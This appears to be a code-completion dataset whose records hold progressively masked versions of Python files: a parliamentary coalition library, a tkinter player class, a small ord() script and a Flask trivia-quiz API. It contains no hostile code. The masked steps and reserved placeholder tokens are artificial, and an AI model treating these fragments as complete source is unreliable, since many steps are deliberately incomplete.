"step-4": "<mask token>\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n 
shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n 
if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
"step-5": "import collections\nimport itertools\nfrom . import stats\n\n__all__ = [\n 'Party',\n 'HoR',\n 'Coalition'\n]\n\nParty = collections.namedtuple('Party', 'name,votes,seats')\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [vi / v for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [si / s for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < 
other.seats\n\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat)\n for party in self._parties}\n elif stat in (\n stats.bantsaf_influence,\n stats.shepli_shubic,\n stats.jonson_general,\n stats.jonson_influence,\n stats.digen_pakel_general,\n stats.digen_pakel_influence,\n stats.holer_pakel,\n ):\n return {party.name: stat(self, party)\n for party in self._parties}\n elif stat not in (\n 'bantsaf_influence',\n 'shepli_shubic',\n 'jonson_general',\n 'jonson_influence',\n 'digen_pakel_general',\n 'digen_pakel_influence',\n 'holer_pakel',\n ):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party)\n for party in self._parties}\n\n\nclass Coalition(HoR):\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other, )\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in 
HoR'.format(intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return (\n (self > opposition)\n and\n ((self - party) <= (opposition + party))\n )\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n\n",
"step-ids": [
31,
32,
34,
36,
39
]
}
|
[
31,
32,
34,
36,
39
] |
from random import randint
from Ball import Ball
from Util import Vector, Rectangle
class Player:
    """A square player piece rendered on a tkinter canvas."""

    RADIUS = 10

    COLOR1 = "#80d6ff"
    COLOR2 = "#ff867c"
    OUTLINE = "#000000"

    @property
    def right(self):
        # Position shifted RADIUS along -x.
        return self.pos.sub(Vector(Player.RADIUS, 0))

    @property
    def left(self):
        # Position shifted RADIUS along +x.
        return self.pos.add(Vector(Player.RADIUS, 0))

    @property
    def color(self):
        # Map team number to its fill colour; unknown teams yield None.
        return {1: Player.COLOR1, 2: Player.COLOR2}.get(self.team)

    def __init__(self, canvas, team):
        self.canvas = canvas
        self.team = team
        self.pos = Vector(0, 0)
        self.old_pos = Vector(0, 0)
        self.shape = None  # canvas item id, created lazily on first paint

    def set(self, v):
        """Jump to *v*, remembering the previous position, then repaint."""
        self.old_pos, self.pos = self.pos, v
        self.paint()

    def move(self, v: Vector):
        """Shift the player by the offset *v*."""
        self.set(self.pos.add(v))

    def move_to_point(self, point: Vector):
        """Step towards *point* with a random speed in (0, 1]."""
        speed = randint(1, 10) / 10
        direction = point.sub(self.pos).norm()
        self.move(direction.mul(Vector(speed, speed)))

    def get_ball(self, ball):
        """Attach *ball* to the team-dependent side of the player."""
        if self.team == 1:
            side = self.right
        elif self.team == 2:
            side = self.left
        else:
            return
        ball.set(side)

    def paint(self):
        """Create the canvas rectangle on first use, then move it by the
        delta between the previous and current position."""
        if self.shape is None:
            r = Player.RADIUS
            self.shape = self.canvas.create_rectangle(
                -r, -r, r, r, outline=Player.OUTLINE, fill=self.color)
        delta = self.pos.sub(self.old_pos)
        self.canvas.move(self.shape, delta.x, delta.y)

    def rectangle(self) -> Rectangle:
        """Axis-aligned square of half-width RADIUS around the position."""
        return self.pos.rect(Player.RADIUS)

    def ball_hit_test(self, ball: Ball) -> bool:
        """True when the ball's position lies inside the player's square."""
        return self.rectangle().hit(ball.pos)
|
normal
|
{
"blob_id": "04b02931b749ad06a512b78ca5661ae1f5cb8a9c",
"index": 5534,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Player:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n <mask token>\n <mask token>\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n <mask token>\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -\n Player.RADIUS, Player.RADIUS, Player.RADIUS, outline=Player\n .OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n <mask token>\n\n def ball_hit_test(self, ball: Ball) ->bool:\n return self.rectangle().hit(ball.pos)\n",
"step-3": "<mask token>\n\n\nclass Player:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n <mask token>\n <mask token>\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n\n def move_to_point(self, point: Vector):\n v = randint(1, 10) / 10\n self.move(point.sub(self.pos).norm().mul(Vector(v, v)))\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -\n Player.RADIUS, Player.RADIUS, Player.RADIUS, outline=Player\n .OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n <mask token>\n\n def ball_hit_test(self, ball: Ball) ->bool:\n return self.rectangle().hit(ball.pos)\n",
"step-4": "from random import randint\nfrom Ball import Ball\nfrom Util import Vector, Rectangle\n\n\nclass Player:\n RADIUS = 10\n COLOR1 = '#80d6ff'\n COLOR2 = '#ff867c'\n OUTLINE = '#000000'\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n\n @property\n def color(self):\n if self.team == 1:\n return Player.COLOR1\n elif self.team == 2:\n return Player.COLOR2\n\n def __init__(self, canvas, team):\n self.canvas = canvas\n self.team = team\n self.pos = Vector(0, 0)\n self.old_pos = Vector(0, 0)\n self.shape = None\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n\n def move_to_point(self, point: Vector):\n v = randint(1, 10) / 10\n self.move(point.sub(self.pos).norm().mul(Vector(v, v)))\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -\n Player.RADIUS, Player.RADIUS, Player.RADIUS, outline=Player\n .OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n\n def rectangle(self) ->Rectangle:\n return self.pos.rect(Player.RADIUS)\n\n def ball_hit_test(self, ball: Ball) ->bool:\n return self.rectangle().hit(ball.pos)\n",
"step-5": "from random import randint\n\nfrom Ball import Ball\nfrom Util import Vector, Rectangle\n\n\nclass Player:\n RADIUS = 10\n\n COLOR1 = \"#80d6ff\"\n COLOR2 = \"#ff867c\"\n OUTLINE = \"#000000\"\n\n @property\n def right(self):\n return self.pos.sub(Vector(Player.RADIUS, 0))\n\n @property\n def left(self):\n return self.pos.add(Vector(Player.RADIUS, 0))\n\n @property\n def color(self):\n if self.team == 1:\n return Player.COLOR1\n elif self.team == 2:\n return Player.COLOR2\n\n def __init__(self, canvas, team):\n self.canvas = canvas\n self.team = team\n self.pos = Vector(0, 0)\n self.old_pos = Vector(0, 0)\n self.shape = None\n\n def set(self, v):\n self.old_pos = self.pos\n self.pos = v\n self.paint()\n\n def move(self, v: Vector):\n self.set(self.pos.add(v))\n\n def move_to_point(self, point: Vector):\n v = randint(1, 10) / 10\n self.move(point.sub(self.pos).norm().mul(Vector(v, v)))\n\n def get_ball(self, ball):\n if self.team == 1:\n ball.set(self.right)\n elif self.team == 2:\n ball.set(self.left)\n\n def paint(self):\n if self.shape is None:\n self.shape = self.canvas.create_rectangle(-Player.RADIUS, -Player.RADIUS, Player.RADIUS, Player.RADIUS,\n outline=Player.OUTLINE, fill=self.color)\n delta = self.pos.sub(self.old_pos)\n self.canvas.move(self.shape, delta.x, delta.y)\n\n def rectangle(self) -> Rectangle:\n return self.pos.rect(Player.RADIUS)\n\n def ball_hit_test(self, ball: Ball) -> bool:\n return self.rectangle().hit(ball.pos)\n",
"step-ids": [
0,
8,
9,
14,
15
]
}
|
[
0,
8,
9,
14,
15
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(ord(s))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = input()
print(ord(s))
<|reserved_special_token_1|>
import sys, string, math
s = input()
print(ord(s))
|
flexible
|
{
"blob_id": "ade300f2921ca860bbe92aa351df2c88238b7996",
"index": 6039,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(ord(s))\n",
"step-3": "<mask token>\ns = input()\nprint(ord(s))\n",
"step-4": "import sys, string, math\ns = input()\nprint(ord(s))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
    """Attach permissive CORS headers to every outgoing response."""
    cors_headers = {
        'Access-Control-Allow-Headers': 'Content-Type, Authorization, true',
        'Access-Control-Allow-Methods': 'GET, PATCH,PUT,POST, DELETE, OPTIONS',
    }
    for header, value in cors_headers.items():
        response.headers.add(header, value)
    return response
<|reserved_special_token_0|>
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
    """Return one page (10 items) of questions plus the category list.

    Response JSON: ``success``, ``questions`` (list of question dicts),
    ``total_questions`` (count over the whole table) and ``categories``
    (list of category type strings).
    """
    error = False
    questions = []
    total_questions = 0
    # NOTE(review): Flask's <int:page> converter already guarantees an int,
    # so this guard looks unreachable -- confirm before removing.
    if type(page) is not int:
        abort(422)
    if request.method == 'GET':
        try:
            categories = [category.type for category in Category.query.all()]
            if categories is None:
                abort(404)
            query = Question.query.paginate(page, per_page=10)
            total_questions += len(Question.query.all())
            if query is None:
                abort(404)
            # An empty page is treated as an error and surfaces as 400 below.
            if len(query.items) == 0:
                error = True
            results = query.items
            for question in results:
                _question_ = {'id': question.id, 'question': question.
                    question, 'answer': question.answer, 'category':
                    question.category, 'difficulty': question.difficulty}
                questions.append(_question_)
        except Exception:
            # NOTE(review): this broad handler also catches the abort(404)
            # HTTPExceptions raised above, converting them into a 400 below.
            error = True
            print('Error: {}'.format(sys.exc_info()))
        finally:
            # Response is built inside ``finally`` so it runs on both paths.
            if error:
                abort(400)
            else:
                return jsonify({'success': True, 'questions': questions,
                    'total_questions': total_questions, 'categories':
                    categories})
    else:
        abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
    """Delete the question with the given id.

    Returns JSON ``{'success': True, 'method': 'Delete', 'question': id}``.
    Responds 404 when the id does not exist, 400 on a database failure,
    405 for other HTTP verbs and 422 for a malformed id.
    """
    if request.method != 'DELETE':
        abort(405)
    # NOTE(review): Flask's <int:question_id> converter already guarantees an
    # int, so this guard looks unreachable -- kept for parity with the API.
    if type(question_id) is not int:
        abort(422)
    # BUG FIX: ``get`` returns None for an unknown id; the original passed
    # that None to ``delete`` and surfaced the failure as a 400. Answer with
    # the proper 404 before touching the session.
    question = Question.query.get(question_id)
    if question is None:
        abort(404)
    error = False
    try:
        db.session.delete(question)
        db.session.commit()
    except Exception:
        error = True
        # BUG FIX: roll back the failed transaction (the original left the
        # session dirty; ``add_question`` already rolls back on failure).
        db.session.rollback()
        print('Error: {}'.format(sys.exc_info()))
    finally:
        db.session.close()
    if error:
        abort(400)
    return jsonify({'success': True, 'method': 'Delete',
        'question': question_id})
@app.route('/questions', methods=['POST'])
def add_question():
    """Create a new question from the posted JSON body.

    Expects ``question``, ``answer``, ``category`` and ``difficulty`` keys;
    echoes the posted payload back on success, aborts with 400 on failure.
    """
    if request.method != 'POST':
        abort(405)
    failed = False
    try:
        payload = request.json
        new_question = Question(
            question=payload['question'],
            answer=payload['answer'],
            category=payload['category'],
            difficulty=payload['difficulty'],
        )
        db.session.add(new_question)
        db.session.commit()
    except Exception:
        failed = True
        db.session.rollback()
        print('Error: {}'.format(sys.exc_info()))
    finally:
        # Response is produced inside ``finally`` so it covers both outcomes.
        db.session.close()
        if failed:
            abort(400)
        else:
            print('Added: {}'.format(new_question))
            return jsonify({'success': True, 'question': request.json})
<|reserved_special_token_0|>
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
    """Return one random question from the chosen category that has not
    been asked yet.

    Expects JSON with ``quiz_category`` (``{'id': ...}``; id 0 means all
    categories) and ``previous_questions`` (a list of question ids already
    used). The response's ``question`` is None once every candidate has
    been served. Aborts with 500 on any failure, 405 for other verbs.
    """
    if request.method != 'POST':
        abort(405)
    error = False
    next_question = None
    try:
        data = request.json
        if data['quiz_category']['id'] == 0:
            candidates = Question.query.all()
        else:
            # NOTE(review): the stored category is offset by one from the
            # client-side id -- confirm this matches the frontend mapping.
            candidates = Question.query.filter_by(category=str(int(data[
                'quiz_category']['id']) + 1)).all()
        previous_questions = data['previous_questions']
        # BUG FIX: the original re-rolled random indexes in a while loop and
        # hung forever once every candidate id was in previous_questions
        # (and randint(0, -1) crashed on an empty category). Filter the
        # remaining questions first, then pick one.
        remaining = [q for q in candidates if q.id not in previous_questions]
        if remaining:
            _question_ = random.choice(remaining)
            next_question = {'id': _question_.id, 'question': _question_.
                question, 'answer': _question_.answer, 'category':
                _question_.category, 'difficulty': _question_.difficulty}
    except Exception:
        error = True
        print('Error: {}'.format(sys.exc_info()))
    if error:
        abort(500)
    return jsonify({'success': True, 'question': next_question})
<|reserved_special_token_0|>
@app.errorhandler(405)
def method_not_allowed(error):
    """Return a JSON error body with HTTP status 405 (wrong verb on a route)."""
    return jsonify({'success': False, 'error': 405, 'message':
        'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
    """Return a JSON error body with HTTP status 422 (bad input value)."""
    return jsonify({'success': False, 'error': 422, 'message':
        'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
    """Return a JSON error body with HTTP status 500 (unexpected failure)."""
    return jsonify({'success': False, 'error': 500, 'message':
        'Internal Server Error'}), 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
if type(page) is not int:
abort(422)
if request.method == 'GET':
try:
categories = [category.type for category in Category.query.all()]
if categories is None:
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
abort(404)
if len(query.items) == 0:
error = True
results = query.items
for question in results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': total_questions, 'categories':
categories})
else:
abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
if request.method == 'DELETE':
if type(question_id) is not int:
abort(422)
try:
question = Question.query.get(question_id)
db.session.delete(question)
db.session.commit()
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
return jsonify({'success': True, 'method': 'Delete',
'question': question_id})
else:
abort(405)
@app.route('/questions', methods=['POST'])
def add_question():
error = False
if request.method == 'POST':
try:
new_question = Question(question=request.json['question'],
answer=request.json['answer'], category=request.json[
'category'], difficulty=request.json['difficulty'])
db.session.add(new_question)
db.session.commit()
except Exception:
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
print('Added: {}'.format(new_question))
return jsonify({'success': True, 'question': request.json})
else:
abort(405)
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
if request.method == 'POST':
search_term = str(request.json['searchTerm'])
if type(search_term) is not str:
abort(422)
try:
query_results = Question.query.filter(Question.question.ilike(
'%{}%'.format(search_term))).all()
questions = []
categories = [category.type for category in Category.query.all()]
for question in query_results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
<|reserved_special_token_0|>
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
if request.method == 'POST':
try:
data = request.json
if data['quiz_category']['id'] == 0:
query = Question.query.all()
else:
query = Question.query.filter_by(category=str(int(data[
'quiz_category']['id']) + 1)).all()
previous_questions = data['previous_questions']
index = random.randint(0, len(query) - 1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
index = random.randint(0, len(query) - 1)
potential_question = query[index]
else:
selected = True
_question_ = potential_question
next_question = {'id': _question_.id, 'question': _question_.
question, 'answer': _question_.answer, 'category':
_question_.category, 'difficulty': _question_.difficulty}
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(500)
else:
return jsonify({'success': True, 'question': next_question})
else:
abort(405)
<|reserved_special_token_0|>
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({'success': False, 'error': 405, 'message':
'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({'success': False, 'error': 422, 'message':
'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({'success': False, 'error': 500, 'message':
'Internal Server Error'}), 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
if type(page) is not int:
abort(422)
if request.method == 'GET':
try:
categories = [category.type for category in Category.query.all()]
if categories is None:
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
abort(404)
if len(query.items) == 0:
error = True
results = query.items
for question in results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': total_questions, 'categories':
categories})
else:
abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
if request.method == 'DELETE':
if type(question_id) is not int:
abort(422)
try:
question = Question.query.get(question_id)
db.session.delete(question)
db.session.commit()
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
return jsonify({'success': True, 'method': 'Delete',
'question': question_id})
else:
abort(405)
@app.route('/questions', methods=['POST'])
def add_question():
error = False
if request.method == 'POST':
try:
new_question = Question(question=request.json['question'],
answer=request.json['answer'], category=request.json[
'category'], difficulty=request.json['difficulty'])
db.session.add(new_question)
db.session.commit()
except Exception:
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
print('Added: {}'.format(new_question))
return jsonify({'success': True, 'question': request.json})
else:
abort(405)
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
if request.method == 'POST':
search_term = str(request.json['searchTerm'])
if type(search_term) is not str:
abort(422)
try:
query_results = Question.query.filter(Question.question.ilike(
'%{}%'.format(search_term))).all()
questions = []
categories = [category.type for category in Category.query.all()]
for question in query_results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
<|reserved_special_token_0|>
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
if request.method == 'POST':
try:
data = request.json
if data['quiz_category']['id'] == 0:
query = Question.query.all()
else:
query = Question.query.filter_by(category=str(int(data[
'quiz_category']['id']) + 1)).all()
previous_questions = data['previous_questions']
index = random.randint(0, len(query) - 1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
index = random.randint(0, len(query) - 1)
potential_question = query[index]
else:
selected = True
_question_ = potential_question
next_question = {'id': _question_.id, 'question': _question_.
question, 'answer': _question_.answer, 'category':
_question_.category, 'difficulty': _question_.difficulty}
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(500)
else:
return jsonify({'success': True, 'question': next_question})
else:
abort(405)
@app.errorhandler(400)
def bad_request(error):
return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}
), 400
@app.errorhandler(404)
def resource_not_found(error):
return jsonify({'success': False, 'error': 404, 'message':
'Resource Not Found'}), 404
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({'success': False, 'error': 405, 'message':
'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({'success': False, 'error': 422, 'message':
'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({'success': False, 'error': 500, 'message':
'Internal Server Error'}), 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app.config.from_object('config')
db.init_app(app)
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
